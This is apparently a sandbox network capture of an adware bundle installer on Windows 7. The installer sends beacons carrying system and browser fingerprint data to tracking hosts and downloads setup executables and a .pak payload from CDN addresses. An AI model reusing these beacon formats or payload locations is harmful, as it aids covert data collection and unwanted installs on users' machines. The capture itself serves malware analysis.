R7SjJ8B /KpxjVu5iJDXPxPlSX2gxf3UyCs/5/tBdp9oyUDnsGN4pIqOPplwqVUipF4ns=
..x-amz-request-id: B1BE092E1C6C0BE6..Date: Sat, 18 Apr 2015 23:36:28 
GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, 
must-revalidate..Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT..ETag: "
28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Le
ngth: 35..Server: AmazonS3..GIF89a.............,...........D..;
....


GET /installer-error.gif?action=sesamy&app=65743&appver=0&ver=1_36_01_22&version_date=15-04-17&bic=f1455de99fbc9c9080e7ed2fd747836eIE&verifier=b2eb32d323f5359842a735827d51a4f5&upi=f1455de99fbc9c9080e7ed2fd747836e&procid=C9FC24CEAAF94660B86494E2129E945CPI&srcid=000820&subid=0&zdata=appshatmadness&browser=ie&browserver=10&default=ie&chver=41.0.2272.118&ffver=29.0.1&iever=10.0.9200.16521&curtime=&country=ua&aver=X&error=0&silent=1&os=7(64bit)&osbuild=7601&osprod=Windows 7 Professional N&ossp=Service Pack 1&osinstdt=1363796288&admin=1&type=85899350029&asw=0&asw2=1082139141&asw3=-2147475456&asw4=34816&crtnm=na&procstarttime=1429400187&procruntime=2&rnd=1429400189 HTTP/1.1


Host: errors.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: k41m6UF wd2VERNa8  YljF6D7XoQHePO/v8Vs2o7SgsTjNOFHJ4kR7Omd1C3qrtVD7vUeaUk/0=
x-amz-request-id: 2E68026A86DC59FA
Date: Sat, 18 Apr 2015 23:36:30 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 01 Apr 2015 13:13:52 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: k41m6U
F wd2VERNa8  YljF6D7XoQHePO/v8Vs2o7SgsTjNOFHJ4kR7Omd1C3qrtVD7vUeaUk/0=
..x-amz-request-id: 2E68026A86DC59FA..Date: Sat, 18 Apr 2015 23:36:30 
GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, 
must-revalidate..Last-Modified: Wed, 01 Apr 2015 13:13:52 GMT..ETag: "
28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Le
ngth: 35..Server: AmazonS3..GIF89a.............,...........D..;
....


GET /utility.gif?report=fdata&f=1&c=000820&i=200&n=init_end_funnel_step_name&rnd=1429400190 HTTP/1.1


Host: errors.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: UZVBvY22uoRA9qJ3iai6LVhCBJeqx2M3Tnud0TGY1oZX12h0iA3J6Js77XzHAnCBIWX8vhRMJ24=
x-amz-request-id: 48D4A3DFFDA85755
Date: Sat, 18 Apr 2015 23:36:31 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000820&i=300&n=deploy_start_funnel_step_name&rnd=1429400190 HTTP/1.1


Host: errors.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: gaCzFa6CnJ/IIxvYAGJfzP7kvxo5vpWBgMhb9XE0rd1BiA tOxepP6/63rtPSJ7z9SSGB9Rr2zw=
x-amz-request-id: ADEFB61488AC9DAB
Date: Sat, 18 Apr 2015 23:36:31 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: gaCzFa
6CnJ/IIxvYAGJfzP7kvxo5vpWBgMhb9XE0rd1BiA tOxepP6/63rtPSJ7z9SSGB9Rr2zw=
..x-amz-request-id: ADEFB61488AC9DAB..Date: Sat, 18 Apr 2015 23:36:31 
GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, 
must-revalidate..Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT..ETag: "
28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Le
ngth: 35..Server: AmazonS3..GIF89a.............,...........D..;
....


GET /utility.gif?report=fdata&f=1&c=000820&i=400&n=deploy_verifier_start_funnel_step_name&rnd=1429400191 HTTP/1.1


Host: errors.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: 77l4rdBT2iuD99w148tVtq psQk4k12SWnSCvBUnR2b0lS2um56bapH8cszrUzfDWiEQJsUavww=
x-amz-request-id: 4B5288D1E191E801
Date: Sat, 18 Apr 2015 23:36:32 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: 77l4rd
BT2iuD99w148tVtq psQk4k12SWnSCvBUnR2b0lS2um56bapH8cszrUzfDWiEQJsUavww=
..x-amz-request-id: 4B5288D1E191E801..Date: Sat, 18 Apr 2015 23:36:32 
GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, 
must-revalidate..Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT..ETag: "
28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Le
ngth: 35..Server: AmazonS3..GIF89a.............,...........D..;
....


GET /utility.gif?report=fdata&f=1&c=000820&i=500&n=deploy_notification_start_funnel_step_name&rnd=1429400191 HTTP/1.1


Host: errors.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: kb8PKlAJ4lZR4dI95Zz6uGnMHHU/MmY9yIT CO4uqHeki5Jw2yZGuicf9Q 6Blc1ppF hpr0/jo=
x-amz-request-id: A004A874C84A19E8
Date: Sat, 18 Apr 2015 23:36:32 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000820&i=600&n=deploy_omaha_start_funnel_step_name&rnd=1429400191 HTTP/1.1


Host: errors.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: quwRs1KYsueB9oZfpPf8vR2x8YetmxQwcmjqzoaInDZZM5 MsR7PNfBD/hqCMrnsryMqNTKhagc=
x-amz-request-id: FF7BE3B780EDCDB0
Date: Sat, 18 Apr 2015 23:36:33 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000820&i=700&n=deploy_ch_start_funnel_step_name&rnd=1429400192 HTTP/1.1


Host: errors.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: ZY9vcpTEEpdP1HE0txLP6bS/1/qwC7XVMeYoJbcyI9bAxajCaoyXXFo8J827axBOScs5Pabvb0o=
x-amz-request-id: B9150967ECDBEFA5
Date: Sat, 18 Apr 2015 23:36:33 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000820&i=800&n=deploy_nova_start_funnel_step_name&rnd=1429400192 HTTP/1.1


Host: errors.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: Hc4dl8ToqM6700ZrqGChMktFy CifT1A7hWlZVFgkHzRpdU6iaVSFRUp3JMXfR1sD5BtPSlMmNg=
x-amz-request-id: EAC490D54B0E79AB
Date: Sat, 18 Apr 2015 23:36:33 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000820&i=900&n=deploy_ff_start_funnel_step_name&rnd=1429400192 HTTP/1.1


Host: errors.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: F9VkQkBmIbP1LXQxQZUHe5YgXSQSMBoZflkMwGctPz7j9OhDsiD oH7ZECSBfFFkPE1qkzMEmWI=
x-amz-request-id: B35CD69A3F855EF9
Date: Sat, 18 Apr 2015 23:36:33 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: F9VkQk
BmIbP1LXQxQZUHe5YgXSQSMBoZflkMwGctPz7j9OhDsiD oH7ZECSBfFFkPE1qkzMEmWI=
..x-amz-request-id: B35CD69A3F855EF9..Date: Sat, 18 Apr 2015 23:36:33 
GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, 
must-revalidate..Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT..ETag: "
28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Le
ngth: 35..Server: AmazonS3..GIF89a.............,...........D..;
....


GET /utility.gif?report=fdata&f=1&c=000820&i=950&n=deploy_nova_ie_start_funnel_step_name&rnd=1429400193 HTTP/1.1


Host: errors.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: JKzo0p9jBN1/mJ7nu/7vLT0wB1PRF7 FVG9dbFehziUMCAxFfbAKAgYIyazDNqAk91GEDIlOAd4=
x-amz-request-id: E8D3049133160C05
Date: Sat, 18 Apr 2015 23:36:35 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000820&i=1000&n=deploy_ie_start_funnel_step_name&rnd=1429400194 HTTP/1.1


Host: errors.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: GAyYfEEfDM0O3og/bwwY3URaxbQA7qsxMTzTsEe2pfc2uLIW JcoLFWSycOffxD9mSMiw8EqV U=
x-amz-request-id: 6B32EABBC5A57506
Date: Sat, 18 Apr 2015 23:36:35 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000820&i=1100&n=deploy_updater_start_funnel_step_name&rnd=1429400194 HTTP/1.1


Host: errors.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: hpdFbqY65f6MkYZbSXnjgA9hbE1k7Wbb6xayNC/Qdt37fLQq/zdKChIN0K2GQzj9t3p31FZlBB8=
x-amz-request-id: 00E450B53F0300C1
Date: Sat, 18 Apr 2015 23:36:35 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: hpdFbq
Y65f6MkYZbSXnjgA9hbE1k7Wbb6xayNC/Qdt37fLQq/zdKChIN0K2GQzj9t3p31FZlBB8=
..x-amz-request-id: 00E450B53F0300C1..Date: Sat, 18 Apr 2015 23:36:35 
GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, 
must-revalidate..Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT..ETag: "
28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Le
ngth: 35..Server: AmazonS3..GIF89a.............,...........D..;
....


GET /utility.gif?report=fdata&f=1&c=000820&i=1200&n=deploy_watchdog_start_funnel_step_name&rnd=1429400195 HTTP/1.1


Host: errors.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: LKuAVR0c7oeTgy1BiTsZWT/jlZ84dF/5VKu2VfKJWCWk//m3stGqxKt02giZlq6TIs8UbHa6QkQ=
x-amz-request-id: 78EE1342A3AFFD20
Date: Sat, 18 Apr 2015 23:36:36 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000820&i=10000&n=deploy_end_funnel_step_name&rnd=1429400195 HTTP/1.1


Host: errors.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: vVI6VrRYgt 1cGUugdDwpn2skXMfWS3oOoJPxYi2VqdHzDcN5br0vYQuaGIAGgfqOxGw/w0u67c=
x-amz-request-id: 23449747FCE8886E
Date: Sat, 18 Apr 2015 23:36:36 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: vVI6Vr
RYgt 1cGUugdDwpn2skXMfWS3oOoJPxYi2VqdHzDcN5br0vYQuaGIAGgfqOxGw/w0u67c=
..x-amz-request-id: 23449747FCE8886E..Date: Sat, 18 Apr 2015 23:36:36 
GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, 
must-revalidate..Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT..ETag: "
28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Le
ngth: 35..Server: AmazonS3..GIF89a.............,...........D..;..



GET /root.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.globalsign.net


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:38:24 GMT
Content-Type: application/x-pkcs7-crl
Content-Length: 649
Connection: keep-alive
Set-Cookie: __cfduid=d26f1797861ebcf9867136d0cfb4f6c2c1429400304; expires=Sun, 17-Apr-16 23:38:24 GMT; path=/; domain=.globalsign.net; HttpOnly
Expires: Wed, 15 Jul 2015 00:00:00 GMT
Last-Modified: Mon, 23 Mar 2015 00:00:00 GMT
Cache-Control: public, max-age=7518096
CF-Cache-Status: HIT
Accept-Ranges: bytes
Server: cloudflare-nginx
CF-RAY: 1d9433fe13560485-FRA
0...0..m...0...*.H........0W1.0...U....BE1.0...U....GlobalSign nv-sa1.
0...U....Root CA1.0...U....GlobalSign Root CA..150323000000Z..15071500
0000Z0..0*.........D.....141125000000Z0.0...U.......0*........)E.....1
41125000000Z0.0...U.......0*........ ...h..141125000000Z0.0...U.......
0*........,^.....141125000000Z0.0...U......../0-0...U......00...U.#..0
...`{f.E....P/}..4....K0...*.H.............&...f#...5.[4........{pV.#.
F........:...*Q.....Mx9}....,.S.D.>@.Ju.[)c...`.?.j~...-..{.FHj....
.#.C2.[.,`.......)...Bj2........n...........%......p.6......Q.....1..p
d......F.........mJO.!y.W.......V.M).N.R.....V..|...7.ry. ..gy..I\....
.....j....... .z.E..".HTTP/1.1 200 OK..Date: Sat, 18 Apr 2015 23:38:24
 GMT..Content-Type: application/x-pkcs7-crl..Content-Length: 649..Conn
ection: keep-alive..Set-Cookie: __cfduid=d26f1797861ebcf9867136d0cfb4f
6c2c1429400304; expires=Sun, 17-Apr-16 23:38:24 GMT; path=/; domain=.g
lobalsign.net; HttpOnly..Expires: Wed, 15 Jul 2015 00:00:00 GMT..Last-
Modified: Mon, 23 Mar 2015 00:00:00 GMT..Cache-Control: public, max-ag
e=7518096..CF-Cache-Status: HIT..Accept-Ranges: bytes..Server: cloudfl
are-nginx..CF-RAY: 1d9433fe13560485-FRA..0...0..m...0...*.H........0W1
.0...U....BE1.0...U....GlobalSign nv-sa1.0...U....Root CA1.0...U....Gl
obalSign Root CA..150323000000Z..150715000000Z0..0*.........D.....1411
25000000Z0.0...U.......0*........)E.....141125000000Z0.0...U.......0*.
....... ...h..141125000000Z0.0...U.......0*........,^.....141125000000
Z0.0...U......../0-0...U......00...U.#..0...`{f.E....P/}..4....K0.
<<< skipped >>>


GET /mag/ytaiesmt_smtyc_setup.exe HTTP/1.1
Range: bytes=482374-
User-Agent: Better Installer(Mozilla)
Host: d2otsfra4otprh.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 803955
Connection: keep-alive
Cache-Control: no-cache
Last-Modified: Mon, 23 Mar 2015 09:00:36 GMT
Accept-Ranges: bytes
ETag: "b8e31d44765d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 18 Apr 2015 22:40:26 GMT
Content-Range: bytes 482374-1286328/1286329
X-Cache: RefreshHit from cloudfront
Via: 1.1 99c43dac805911a3599ea503f80ef8f4.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 2PbK39-eVE7K9_C5SMVXbegawJQ8qU2L1Vgz7cYnDDDJqT2DwlCV4g==
....&../...g...cWm?k.....^e...U$....}.>........Zz..e#51..n#.%N}....
Y...'4v....-w.u..._>.....q..........T...cX....2.(.C......6.....P...
.!F._.Q.1.uR.p........V1....D.2.......8.(..q...|F!CK..i}..lU........K.
....7..}a..>.V.=..|.jw7Sf...X.rZ]....$..aj.1.U...\kh)...... 3K.....
/5....S.....).x..%..\.T..@cHQ.&...^.%k....[.../r.au...MJ.Z.....Y(....j
(...i.....1....x.k.:.i......@....)w..A....5QW=.w?.a..QK....'.K..A.....
p./:n.#.....pw..S.p....2j]F.6[.}.v.O.....y....{ .:.u.....b...\..'...`.
.S*.N.?..o.Z2.....O1...~G.p.t.Wu|..T&p.'[email protected]..]...M..0/.....Wc.
..>?W..........y1....?,.1.6 ..TN.... ...{....|..........#.ot.py....
thd..ex..DF......Rb.p..I.>.U.y.g..ay..b.M...S.e.Ug.z..>.j.f%....
..........V/kn.P..Y.>.,..h ^..2.l-...~Y.8..h.........L...@.........
.x4e.....l...F......:...l<..........'....."..U..GW..a...}.5.~.....B
...A.B.[.~o..(.....sI......a:.Z?..[....... ..i.........wZ..&Y...,.U[.3
...>.u.x../2..O..-..(M..*<F}..9x............*2xp../.h..cx.O.....
4F....$.1....#..I.Y,.yV...L...c...e..y...lMCr..6.(.1..G6....Z-.!...Z..
[email protected]]u.>.*
....\. ...!..^<......T..$#$...._`[email protected]..*[email protected][
.....>......v66i=.U'j......x8&.B..v.......7....q...(.m....x....f.h.
pt..4&4.Q-.&O.........0l^..^3... .h.......Vv...e.E...I..P.3r......... 
.F.'. Y....\h..f.N.....;.?..wk`_qU^TG..w.>gjI.Jc?..ix.F......V..P5.
.. r.3..3.(....|Fy.......k...%....w.....Y..=.7.....rv.XgH......}.7....
M...a..M%...z:r..-#.Q.m...2..t.._..\...d ....X.$..vM......;...A...
<<< skipped >>>


GET /v4/sof-installer/267123711_198339_B48A115F?action=smt.installer.istartsurf.finish HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com


HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sat, 18 Apr 2015 23:36:14 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.57 ms","message":"store 1 action and 0 upd
ate "}..0..HTTP/1.1 200 OK..Server: nginx/0.7.67..Date: Sat, 18 Apr 20
15 23:36:14 GMT..Content-Type: text/html; charset=utf-8..Transfer-Enco
ding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api
-version: v4..48..{"stats":"ok","time":"0.57 ms","message":"store 1 ac
tion and 0 update "}..0..



GET /mag/ytaiesmt_smtyc_setup.exe HTTP/1.1
Range: bytes=321583-
User-Agent: Better Installer(Mozilla)
Host: d2otsfra4otprh.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 964746
Connection: keep-alive
Cache-Control: no-cache
Last-Modified: Mon, 23 Mar 2015 09:00:36 GMT
Accept-Ranges: bytes
ETag: "b8e31d44765d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 18 Apr 2015 22:40:26 GMT
Content-Range: bytes 321583-1286328/1286329
X-Cache: RefreshHit from cloudfront
Via: 1.1 4cac7d535f87b2835425f2dc5dffeac7.cloudfront.net (CloudFront)
X-Amz-Cf-Id: DU7zDJVqlhtsSYguB8DpUHKDGe116IwUzX2pURB_v_l2f0sFZYZTAg==
.`../r"k>F-O../......I......(..vWPN.. ...J......."..j&.b.n.........
........V...O_.Zj...~4..T...}TMZ.....y.s.i.....G..b......[.x....,3....
Q....%.'.M.m.}........j..E...........m......>.P....y.x".G.2c....}.'
.Q.....eP../..... h....9.8m(....'}"..(.U.N.....6E.._._&J.rv...iS.....t
...^^!......g..X..$.../...|..l...!.E..Q9..#.$.I...Y..<G............
_.`TKq`....*...E.R...h............H^A.W.2=....%m..9s...p..WS ...n....6
_..U...d...N........*......aqj.......e......f...J.u.4...3...&j.=~..3..
E..x.a....X..".G.J.aQSF1..4.b..O...L.....a.[..,............8..!M......
...#v..$..Gv}h../.6o.x.:/.r..5lF....5W.4..s..\q~.D >{.wJ/..DA S....
MOb....Y'E.0..\Ah.9.....{.:...-)kj[..q.-....n>.IC..2......m-...*f"J
mmVr....".o..n....\O$..V~p*I...x[&..d{......R0.L.>C.Xn....0..]....$
..L..5=k.q.....A.l..I.'..g.....$.....u{.c......).;Ke\H..?.x...8......{
<.p.....=D.........W.....B.R.p.E....U..HM....#..S.3f<r..1|:...N"
P}O..U... .5.JZ..x..>8..m......H....E...N...Y.._.\..x...S..<..*`
=.@[email protected].......)Y.b.@H/..?..n9b......4....x["..i.wH.....c...iP7k.s.r.
........V:;M..=I.d..........K'[email protected]......
..........S....?_..F...#-Of..`:......&.. E..Rg/..{...E..f.....n...O.5.
..'zd..*.T.....A..#!"@.>.......AW...$ra....M....... <O.>l[...
....n...c.g.).*N..A=..[6q..'..2..Zg..h}........'>...^kGT......,i...
.m|y....I..V...D....#.]............s.k...E.x....Z........J?..{m.......
...T.).*.4".....cv._....7S[2O.)<.f&D.`...73t...^{.._k'..{.ref...gS.
..=(..Q.4.4F...O....J.t...9t.;..!OH$S..B....[....9....mS....'.^...
<<< skipped >>>


GET / HTTP/1.1
Host: ipgeoapi.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:35:49 GMT
Connection: keep-alive
Content-Type: application/json;charset=utf-8
Content-Length: 40
Server: thin 1.4.1 codename Chromeo
Via: 1.1 vegur
{"country_code":222,"country_name":"UA"}HTTP/1.1 200 OK..Date: Sat, 18
 Apr 2015 23:35:49 GMT..Connection: keep-alive..Content-Type: applicat
ion/json;charset=utf-8..Content-Length: 40..Server: thin 1.4.1 codenam
e Chromeo..Via: 1.1 vegur..{"country_code":222,"country_name":"UA"}..



GET /infv5/index/3428/bnd HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: dqoup4b5zs0bi.cloudfront.net
Accept: */*
Accept-Encoding: gzip, deflate
Connection:keep-alive


HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
Date: Sat, 18 Apr 2015 23:35:15 GMT
Location: hXXp://dlrkbt247pbk6.cloudfront.net/3428_3b67a5ef5d450c1556c543c6323981d9/1.pak
Server: nginx
X-Cache: Miss from cloudfront
Via: 1.1 e5f6d747af660cb1af4be9da161afb6f.cloudfront.net (CloudFront)
X-Amz-Cf-Id: IOZSzziT7GVoIeyDhitY2iZxTuZuEYnxTGYQU8NOkallo1ledRboaw==
HTTP/1.1 302 Moved Temporarily..Content-Type: text/html..Content-Lengt
h: 0..Connection: keep-alive..Date: Sat, 18 Apr 2015 23:35:15 GMT..Loc
ation: hXXp://dlrkbt247pbk6.cloudfront.net/3428_3b67a5ef5d450c1556c543
c6323981d9/1.pak..Server: nginx..X-Cache: Miss from cloudfront..Via: 1
.1 e5f6d747af660cb1af4be9da161afb6f.cloudfront.net (CloudFront)..X-Amz
-Cf-Id: IOZSzziT7GVoIeyDhitY2iZxTuZuEYnxTGYQU8NOkallo1ledRboaw==..



GET /searchprotect/up?ptid=smt&sid=IHProtectPlugin&ln=en_us&ver=4.0.1.2105&uid=267123711_198339_B48A115F&dp=0 HTTP/1.1
Host: VVV.theviilage.com
User-Agent: Mozilla/4.0
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 18 Apr 2015 23:38:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14p1
1..0..0..



GET /install.gif?bundle=istartsurf&ptid=smt&uid=267123711_198339_B48A115F HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: log.very911.com


HTTP/1.1 404 Not Found
Server: Tengine/1.2.2
Date: Sat, 18 Apr 2015 23:35:47 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 668
Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">..<html>
..<head><title>404 Not Found</title></head>..&
lt;body bgcolor="white">..<h1>404 Not Found</h1>..<p
>The requested URL was not found on this server. Sorry for the inco
nvenience.<br/>..Please report this message and include the foll
owing information to us.<br/>..Thank you very much!</p>..&
lt;table>..<tr>..<td>URL:</td>..<td>hXXp://
log.very911.com:8080/install.gif?bundle=istartsurf&ptid=smt&ui
d=267123711_198339_B48A115F</td>..</tr>..<tr>..<t
d>Server:</td>..<td>us-pub00.v9.com</td>..</tr
>..<tr>..<td>Date:</td>..<td>2015/04/18 18:
35:47</td>..</tr>..</table>..<hr/>Powered by T
engine/1.2.2..</body>..</html>..HTTP/1.1 404 Not Found..Se
rver: Tengine/1.2.2..Date: Sat, 18 Apr 2015 23:35:47 GMT..Content-Type
: text/html; charset=utf-8..Content-Length: 668..Connection: keep-aliv
e..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">..<html&
gt;..<head><title>404 Not Found</title></head>
..<body bgcolor="white">..<h1>404 Not Found</h1>..&l
t;p>The requested URL was not found on this server. Sorry for the i
nconvenience.<br/>..Please report this message and include the f
ollowing information to us.<br/>..Thank you very much!</p>
..<table>..<tr>..<td>URL:</td>..<td>
<<< skipped >>>


GET /sd?is=sm HTTP/1.1
Range: bytes=392454-
User-Agent: Better Installer(Mozilla)
Host: install-cdn.theswiftrecord.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Pragma: no-cache
Content-Type: application/octet-stream
Server: Microsoft-IIS/7.5
Content-Disposition: attachment; filename=SwiftRecordSetup.exe
X-AspNet-Version: 4.0.30319
SVR: SP004C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Cache-Control: private, max-age=86400
Expires: Sun, 19 Apr 2015 23:35:14 GMT
Date: Sat, 18 Apr 2015 23:35:14 GMT
Content-Range: bytes 392454-523271/523272
Content-Length: 130818
Connection: keep-alive
